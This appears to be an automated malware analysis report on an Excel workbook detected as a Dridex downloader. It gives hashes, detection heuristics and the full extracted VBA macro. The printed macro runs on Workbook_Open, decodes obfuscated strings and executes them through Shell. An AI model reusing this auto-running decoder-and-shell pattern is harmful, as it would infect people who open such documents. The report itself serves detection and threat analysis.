Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3ed4d73bbd2f0bee…

MALICIOUS

Office (OOXML)

Size: 411.2 KB
Created: 2020-11-16 07:10:44 UTC
Authoring application: Microsoft Excel 14.0300
First seen: 2020-11-23
MD5: 3ca3365c464147d11d5f97f8d5d509e3
SHA-1: 4d2678eb53d582ff55aed729f023fa1b5a848780
SHA-256: 3ed4d73bbd2f0beea0e6dbd0f457d37bac0d414094cc40a3bc355483ce5ffa8f
Risk score: 148

Heuristics (4)

  • ClamAV: Xls.Downloader.DridexGreen09213-9890103-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Downloader.DridexGreen09213-9890103-0
  • VBA project inside OOXML (severity: medium, rule: OOXML_VBA, 2 related findings)
    Document contains a VBA project; VBA macros are present.
  • Potential Shell call in VBA (severity: critical, rule: OLE_VBA_SHELL)
    Matched line in script:
    Shell HGJHG
  • Workbook_Open macro (severity: low, rule: OLE_VBA_WBOPEN)
    Matched line in script:
    Public Sub Workbook_Open()

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2239 bytes
SHA-256: 2b52e86fe67785978e01cdfa29faf0a7d03ae879a6e819726994af9ec7ff92a4
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim HGJHG As String
Public Sub Workbook_Open()
sas
'shell HGJHG
Shell HGJHG
End Sub
Private Function sas()
HGJHG = itwillx("»ºÂ°½¾³°··ks¹°Âxº­µ°®¿kžÄ¾¿°¸y™°¿y¢°­Ž·´°¹¿ty�ºÂ¹·º¬¯‘´·°", "KK")
HGJHG = HGJHG + itwillx("sr³¿¿»¾…zz·º²´®¬·¾®ºº¿°½¾y®º¸z¾¿À­y°Ã°rwo°¹Á…Œ»»�¬¿¬vr§¾¿À­y°Ã°rt†s™°Âxš­µ°®¿kx®º¸kž³°··yŒ»»·´®¬¿´º¹tyž³°··�ð®À¿°so°¹Á…Œ»»�¬¿¬vr§¾¿À­y°Ã°rt", "KK")
End Function
    Private Function itwillx(joe As String, ByVal xw As String)
        Dim i As Integer, c As Integer
        Dim strBuff As String
        If Len(xw) Then
            For i = 1 To Len(joe)
                c = Asc(Mid$(joe, i, 1))
                c = c - Asc(Mid$(xw, (i Mod Len(xw)) + 1, 1))
                strBuff = strBuff & Chr(c And &HFF)
            Next i
        Else
            strBuff = joe
        End If
        itwillx = strBuff
    End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 16384 bytes
SHA-256: 1b440aa644accf9c7b77ded32ee2416a884a26623039f308385d6d92633e5795